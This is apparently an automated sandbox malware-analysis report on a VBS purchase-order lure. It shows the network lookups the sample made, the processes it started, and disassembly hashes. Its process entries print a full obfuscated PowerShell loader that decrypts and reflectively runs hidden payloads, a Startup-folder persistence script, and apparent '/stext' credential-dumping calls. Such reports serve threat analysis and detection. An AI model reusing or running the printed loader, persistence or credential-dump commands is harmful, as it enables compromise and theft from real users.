      Jul 3, 2024 08:44:01.102993011 CEST1.1.1.1192.168.2.60xd3f0No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

      HTTP Request Dependency Graph

      • geoplugin.net

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.649715178.237.33.50801484C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Jul 3, 2024 08:44:01.111507893 CEST71OUTGET /json.gp HTTP/1.1
      Host: geoplugin.net
      Cache-Control: no-cache
      Jul 3, 2024 08:44:01.722057104 CEST1170INHTTP/1.1 200 OK
      date: Wed, 03 Jul 2024 06:44:01 GMT
      server: Apache
      content-length: 962
      content-type: application/json; charset=utf-8
      cache-control: public, max-age=300
      access-control-allow-origin: *
      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:02:43:51
      Start date:03/07/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs"
      Imagebase:0x7ff614150000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:2
      Start time:02:43:51
      Start date:03/07/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat
      Imagebase:0x7ff7dde00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      General

      Target ID:3
      Start time:02:43:51
      Start date:03/07/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff66e660000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      General

      Target ID:4
      Start time:02:43:53
      Start date:03/07/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      Imagebase:0x7ff7dde00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:5
      Start time:02:43:53
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      General

      Target ID:6
      Start time:02:43:53
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:8
      Start time:02:44:05
      Start date:03/07/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd" "
      Imagebase:0x7ff7dde00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:9
      Start time:02:44:05
      Start date:03/07/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff66e660000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:10
      Start time:02:44:07
      Start date:03/07/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      Imagebase:0x7ff7dde00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:11
      Start time:02:44:07
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:12
      Start time:02:44:07
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:13
      Start time:02:44:07
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:14
      Start time:02:44:07
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:15
      Start time:02:44:07
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:16
      Start time:02:44:08
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:17
      Start time:02:44:08
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge"
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:19
      Start time:02:44:09
      Start date:03/07/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      Imagebase:0xcd0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Disassembly

      Reset < >

        Executed Functions

        Function 033529F0 Relevance: .2, Instructions: 245COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2132209520.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_3350000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 120247054262aab6aa7a8eef01272404973d2df28a5292e0aba4eb94ca2eaf78
        • Instruction ID: 72344121650c146f88e13ea4dafaffba1c281bfe4646ed471bf64938112596be
        • Opcode Fuzzy Hash: 120247054262aab6aa7a8eef01272404973d2df28a5292e0aba4eb94ca2eaf78
        • Instruction Fuzzy Hash: 3AA16874A00209CFCB15CF59C8D49AAFBB1FF89310B2885A9E915EB365D735EC51CBA0
        Function 03352B00 Relevance: .1, Instructions: 108COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2132209520.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_3350000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4f05c490829c79d15c8ca283b77f81b677d05886529a679a46f2f8ea1a574e78
        • Instruction ID: a706f478cdce6ffbead910e1331f55d1aef623c3e9bf2f0df7dc0cbbc0ae19f5
        • Opcode Fuzzy Hash: 4f05c490829c79d15c8ca283b77f81b677d05886529a679a46f2f8ea1a574e78
        • Instruction Fuzzy Hash: CF4114B4A006058FCB05CF58C5D8EAAFBB1FF48310B258699E955AB365C736FC51CBA0
        Function 03353110 Relevance: .1, Instructions: 74COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2132209520.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_3350000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bd3c3da30f05e0de3eae12cf2db267453311e175b13843b6a68a1d1073bddf85
        • Instruction ID: bf40ada07e538d9fcc7ffac31f22774b6045abb8bcf5ee2d9eea3bdc6f051565
        • Opcode Fuzzy Hash: bd3c3da30f05e0de3eae12cf2db267453311e175b13843b6a68a1d1073bddf85
        • Instruction Fuzzy Hash: 99215A78A00209DFCB04DF59C890AAAFBB5FF49310B158199E919E7752C735ED42CBA0
        Function 03353100 Relevance: .1, Instructions: 70COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2132209520.0000000003350000.00000040.00000800.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_3350000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c709c92a687dd7d4bef71940ff92ea1cbba8d4776f5a8b219f6e6e2ef24882b2
        • Instruction ID: e5573299aee4916f49ed8b29677fa18ce9ac5755aed79020033a2718eaed449f
        • Opcode Fuzzy Hash: c709c92a687dd7d4bef71940ff92ea1cbba8d4776f5a8b219f6e6e2ef24882b2
        • Instruction Fuzzy Hash: E4211978A006099FCB04DF99C894DAAFBB1FF89310B158199E909EB752C331EC51CFA0
        Function 032ED01D Relevance: .0, Instructions: 45COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2132077133.00000000032ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 032ED000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_32ed000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3579be31afd2f06237fc680c0bddb455de0e24de8b7db83a53735b12de2b7f44
        • Instruction ID: f7a9519da5e2a1a6d8ff63518b33787b8dacc6f610f4fd16e49bac4d25bb40e1
        • Opcode Fuzzy Hash: 3579be31afd2f06237fc680c0bddb455de0e24de8b7db83a53735b12de2b7f44
        • Instruction Fuzzy Hash: 6B01F231418305AEE720DA25C981B67FF98EF41326F1C855AED080E242C2B9D886CAB1
        Function 032ED006 Relevance: .0, Instructions: 44COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2132077133.00000000032ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 032ED000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_32ed000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b8ae6fb6d3e0176989c550165395988886cda8da889dbc50c5b480bfc568d7ae
        • Instruction ID: dec1a1cd7ae7f8576859a8a15aa435e388d79e68c4681c57103cef00fe425b48
        • Opcode Fuzzy Hash: b8ae6fb6d3e0176989c550165395988886cda8da889dbc50c5b480bfc568d7ae
        • Instruction Fuzzy Hash: 2301407100E3C09FD7128B25C894B52BFB4EF43225F1D81CBD9888F1A3C2699848C772

        Execution Graph

        Execution Coverage:12.6%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:4.5%
        Total number of Nodes:1672
        Total number of Limit Nodes:52
        execution_graph 5995 411e70 5998 411d37 5995->5998 5997 411e90 5999 411d43 5998->5999 6000 411d55 GetPrivateProfileIntA 5998->6000 6003 411c43 memset _itoa WritePrivateProfileStringA 5999->6003 6000->5997 6002 411d50 6002->5997 6003->6002 6610 4140f2 6611 414102 6610->6611 6612 4140fb ??3@YAXPAX 6610->6612 6613 414112 6611->6613 6614 41410b ??3@YAXPAX 6611->6614 6612->6611 6615 414122 6613->6615 6616 41411b ??3@YAXPAX 6613->6616 6614->6613 6617 414132 6615->6617 6618 41412b ??3@YAXPAX 6615->6618 6616->6615 6618->6617 6619 40f105 6620 40f117 6619->6620 6621 40f12a 6619->6621 6620->6621 6772 40e54d 6620->6772 6622 40f136 6621->6622 6663 40da79 6621->6663 6625 40f14c 6622->6625 6783 40dfd9 6622->6783 6626 40f167 6625->6626 6795 40e0a1 6625->6795 6627 40f173 6626->6627 6697 40e725 6626->6697 6631 40f191 6627->6631 6632 40f17b 6627->6632 6634 40f1af 6631->6634 6819 402834 6631->6819 6808 40260a 6632->6808 6636 40f1bb 6634->6636 6831 40eb3d 6634->6831 6637 40f1c9 6636->6637 6848 40ea56 6636->6848 6640 40f1e7 6637->6640 6641 40f1cf 6637->6641 6643 40f1f2 6640->6643 6879 40d9b9 memset memset 6640->6879 6865 40efc1 6641->6865 6646 40f1fe 6643->6646 6710 40d935 memset GetWindowsDirectoryA GetVolumeInformationA 6643->6710 6649 40f232 6646->6649 6715 407f7e 6646->6715 6647 40efc1 34 API calls 6647->6640 6650 40f250 6649->6650 6733 410b95 memset memset 6649->6733 6654 40f26f 6650->6654 6898 410f07 6650->6898 6657 40f27f 6654->6657 6744 40f09c memset 6654->6744 6754 40e675 memset 6657->6754 6913 40fd01 memset memset 6663->6913 6665 40dab7 RegOpenKeyExA 6669 40daa9 6665->6669 6666 40daed RegOpenKeyExA 6666->6669 6669->6665 6669->6666 6670 40db7b RegOpenKeyExA 6669->6670 6671 406958 strlen memcpy 6669->6671 6914 40ff88 6669->6914 6965 40fe5d RegQueryValueExA 6669->6965 6672 40dbaf 6670->6672 6673 40db95 6670->6673 6671->6669 6675 40dc11 RegOpenKeyExA 6672->6675 6678 406958 2 API calls 6672->6678 6978 40fd2e RegQueryValueExA 6673->6978 6676 40dc45 6675->6676 6677 40dc2b 6675->6677 6682 406958 2 API calls 6676->6682 6690 40dc89 6676->6690 6679 40fd2e 9 API calls 6677->6679 6680 40dbe0 6678->6680 6679->6676 6681 406958 2 API calls 6680->6681 6683 40dbf3 6681->6683 6685 40dc76 6682->6685 6683->6675 6687 406958 2 API calls 6685->6687 6687->6690 6927 4103f1 6690->6927 6691 40dcd8 6991 404ce0 6691->6991 6695 404ce0 FreeLibrary 6696 40dce8 6695->6696 6696->6622 7321 411d68 RegOpenKeyExA 6697->7321 6699 40e744 6700 40e8f3 6699->6700 6701 40e74f memset memset memset memset 6699->6701 6700->6627 7322 411dee RegEnumKeyExA 6701->7322 6703 40e7c5 sprintf 6705 411dae 3 API calls 6703->6705 6704 40e8ea RegCloseKey 6704->6700 6708 40e7bd 6705->6708 6706 40e803 strlen 6706->6708 6708->6703 6708->6704 6708->6706 6709 40e85b _mbscpy _mbscpy 6708->6709 7323 411dee RegEnumKeyExA 6708->7323 6709->6708 7324 40d794 6710->7324 6713 40d9b3 6713->6646 6714 40d794 24 API calls 6714->6713 6716 407f8b 6715->6716 7368 407c79 11 API calls 6716->7368 6720 407fa8 6721 407fb3 memset 6720->6721 6722 408077 6720->6722 7371 411dee RegEnumKeyExA 6721->7371 6886 407bc6 6722->6886 6724 407fe4 6725 408072 RegCloseKey 6724->6725 6727 408006 memset 6724->6727 7372 411d68 RegOpenKeyExA 6724->7372 7386 411dee RegEnumKeyExA 6724->7386 6725->6722 6729 411d82 RegQueryValueExA 6727->6729 6730 408039 6729->6730 7373 407e33 strlen 6730->7373 6734 41223f 9 API calls 6733->6734 6735 410be4 strlen strlen 6734->6735 6736 410c07 6735->6736 6737 410c1a 6735->6737 6738 406b4b 4 API calls 6736->6738 7387 4069d3 GetFileAttributesA 6737->7387 6738->6737 6740 410c31 6741 410c45 6740->6741 6742 410c36 6740->6742 6741->6650 7388 410ac5 6742->7388 6745 41223f 9 API calls 6744->6745 6746 40f0db 6745->6746 6747 406efe 3 API calls 6746->6747 6748 40f0e5 6747->6748 7440 4069d3 GetFileAttributesA 6748->7440 6750 40f0ee 6751 40f0f3 6750->6751 6752 40f0ff 6750->6752 7441 405ae8 6751->7441 6752->6657 7467 40f9a0 6754->7467 6757 40e6bc 7478 4064fb 6757->7478 6762 40e5d3 6763 40e5e9 6762->6763 6764 407364 7 API calls 6763->6764 6765 40e644 6764->6765 7647 4085b9 6765->7647 6769 40e661 7665 40819f 6769->7665 7746 40e4b6 memset strlen strlen 6772->7746 6774 40e5cb 6774->6621 6776 40783b 9 API calls 6781 40e592 6776->6781 6777 407898 9 API calls 6777->6781 6778 40e5c0 6780 407930 FindClose 6778->6780 6779 407800 2 API calls 6779->6781 6780->6774 6781->6777 6781->6778 6781->6779 6782 40e54d 33 API calls 6781->6782 6782->6781 6784 40e012 6783->6784 6786 40e05d 6784->6786 6787 40e031 6784->6787 7771 40dd65 6784->7771 6786->6625 6788 40783b 9 API calls 6787->6788 6793 40e05b 6788->6793 6789 407898 9 API calls 6789->6793 6790 40e08e 6791 407930 FindClose 6790->6791 6791->6786 6792 407800 2 API calls 6792->6793 6793->6789 6793->6790 6793->6792 6794 40dfd9 30 API calls 6793->6794 6794->6793 6796 414060 6795->6796 6797 40e0ae memset strlen strlen 6796->6797 6798 40e0fe GetPrivateProfileIntA 6797->6798 6799 40e0eb 6797->6799 6802 40e28c 6798->6802 6807 40e12e 6798->6807 6800 406b4b 4 API calls 6799->6800 6800->6798 6802->6626 6803 40e133 8 API calls 6803->6807 6804 4029d9 strlen 6804->6807 6805 40dcf2 strtoul 6805->6807 6806 406958 strlen memcpy 6806->6807 6807->6802 6807->6803 6807->6804 6807->6805 6807->6806 6809 406b2a GetVersionExA 6808->6809 6810 40261a 6809->6810 6811 402622 RegOpenKeyExW 6810->6811 6812 40272a 6810->6812 6811->6812 6813 402646 memset memset 6811->6813 6812->6631 6814 40270a RegEnumValueW 6813->6814 6815 402721 RegCloseKey 6814->6815 6816 4026a8 wcscpy 6814->6816 6815->6812 7790 40244d memset WideCharToMultiByte 6816->7790 7797 411d68 RegOpenKeyExA 6819->7797 6821 402850 6822 4028e3 6821->6822 6823 40285b memset 6821->6823 6822->6634 7798 411dee RegEnumKeyExA 6823->7798 6825 4028dc RegCloseKey 6825->6822 6827 402888 6827->6825 7799 411d68 RegOpenKeyExA 6827->7799 7800 402730 6827->7800 7807 411dee RegEnumKeyExA 6827->7807 6832 40ec1a 6831->6832 6833 40eb5c memset strlen strlen 6831->6833 6832->6636 6834 40eb93 6833->6834 6835 40eba9 6833->6835 6836 406b4b 4 API calls 6834->6836 6835->6832 7808 4069d3 GetFileAttributesA 6835->7808 6836->6835 6838 40ebc8 6838->6832 7809 412d65 6838->7809 6842 40ebfd 6843 40ec0f 6842->6843 7830 412f4b 6842->7830 7850 412e4d 6843->7850 6849 40eb33 6848->6849 6850 40ea75 memset strlen strlen 6848->6850 6849->6637 6851 40eac2 6850->6851 6852 40eaac 6850->6852 6851->6849 7901 4069d3 GetFileAttributesA 6851->7901 6853 406b4b 4 API calls 6852->6853 6853->6851 6855 40eae1 6855->6849 6856 412d65 6 API calls 6855->6856 6857 40eaf1 6856->6857 6858 412f02 6 API calls 6857->6858 6859 40eb16 6858->6859 6860 40eb28 6859->6860 6861 412f4b 12 API calls 6859->6861 6862 412e4d 9 API calls 6860->6862 6863 40eb21 6861->6863 6862->6849 6864 40d1a5 22 API calls 6863->6864 6864->6860 6866 40f093 6865->6866 6867 40efd6 6865->6867 6866->6647 6868 40783b 9 API calls 6867->6868 6869 40effd 6868->6869 6870 407898 9 API calls 6869->6870 6875 40f008 6870->6875 6871 40f088 6872 407930 FindClose 6871->6872 6872->6866 6873 407898 9 API calls 6873->6875 6875->6871 6875->6873 6877 40f076 CloseHandle 6875->6877 6878 40f05d CloseHandle 6875->6878 7902 4067ba CreateFileA 6875->7902 7903 40f8a8 6875->7903 6877->6875 6878->6875 7954 413735 memset 6879->7954 6882 406958 2 API calls 6883 40da40 6882->6883 6884 406958 2 API calls 6883->6884 6885 40da53 6884->6885 6885->6643 8024 411d68 RegOpenKeyExA 6886->8024 6888 407be4 6889 407c73 